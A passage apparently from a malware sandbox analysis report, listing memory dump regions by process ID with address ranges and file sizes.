                                                                                                                  • memory/1376-318-0x0000020C6F4C0000-0x0000020C6F4C2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1376-317-0x0000020C6F4C0000-0x0000020C6F4C2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1400-303-0x0000016B78730000-0x0000016B78732000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1400-321-0x0000016B78B60000-0x0000016B78BD2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    456KB

                                                                                                                  • memory/1400-304-0x0000016B78730000-0x0000016B78732000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1572-225-0x00000000009A0000-0x0000000000AEA000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.3MB

                                                                                                                  • memory/1572-229-0x0000000000400000-0x000000000089D000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4.6MB

                                                                                                                  • memory/1632-226-0x0000000000400000-0x0000000000884000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4.5MB

                                                                                                                  • memory/1632-214-0x0000000000030000-0x0000000000039000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    36KB

                                                                                                                  • memory/1820-309-0x0000021BE3B40000-0x0000021BE3B42000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1820-323-0x0000021BE4360000-0x0000021BE43D2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    456KB

                                                                                                                  • memory/1820-307-0x0000021BE3B40000-0x0000021BE3B42000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2220-223-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/2300-299-0x000002A3F4D10000-0x000002A3F4D82000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    456KB

                                                                                                                  • memory/2300-290-0x000002A3F45D0000-0x000002A3F45D2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2300-289-0x000002A3F45D0000-0x000002A3F45D2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2316-291-0x00000288D8E50000-0x00000288D8E52000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2316-301-0x00000288D9660000-0x00000288D96D2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    456KB

                                                                                                                  • memory/2316-292-0x00000288D8E50000-0x00000288D8E52000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2428-328-0x000001C89E940000-0x000001C89E9B2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    456KB

                                                                                                                  • memory/2428-324-0x000001C89E0B0000-0x000001C89E0B2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2428-322-0x000001C89E0B0000-0x000001C89E0B2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2472-331-0x000001B624FD0000-0x000001B624FD2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2472-335-0x000001B624FD0000-0x000001B624FD2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2692-293-0x000002DA37F70000-0x000002DA37FE2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    456KB

                                                                                                                  • memory/2692-284-0x000002DA37500000-0x000002DA37502000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2692-281-0x000002DA37500000-0x000002DA37502000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2760-260-0x00000000014C0000-0x00000000014D6000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    88KB

                                                                                                                  • memory/2864-189-0x0000000000DF0000-0x0000000000E08000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    96KB

                                                                                                                  • memory/2864-224-0x000000001BAA0000-0x000000001BAA2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2864-182-0x0000000000DF0000-0x0000000000E08000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    96KB

                                                                                                                  • memory/2864-198-0x0000000001230000-0x0000000001236000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    24KB

                                                                                                                  • memory/3244-197-0x0000000000B11000-0x0000000000B3A000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/3244-218-0x00000000008A0000-0x000000000094E000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    696KB

                                                                                                                  • memory/3244-228-0x0000000000400000-0x000000000089D000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4.6MB

                                                                                                                  • memory/3672-186-0x0000000000600000-0x0000000000608000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/3672-204-0x0000000000D50000-0x0000000000D52000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/3672-183-0x0000000000600000-0x0000000000608000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/3680-210-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    80KB

                                                                                                                  • memory/4016-238-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    80KB

                                                                                                                  • memory/4224-272-0x0000000000FF9000-0x00000000010FA000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.0MB

                                                                                                                  • memory/4224-276-0x00000000006E0000-0x000000000082A000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.3MB

                                                                                                                  • memory/4424-285-0x00000203E55F0000-0x00000203E55F2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/4424-295-0x00000203E5560000-0x00000203E55D2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    456KB

                                                                                                                  • memory/4424-286-0x00000203E55F0000-0x00000203E55F2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB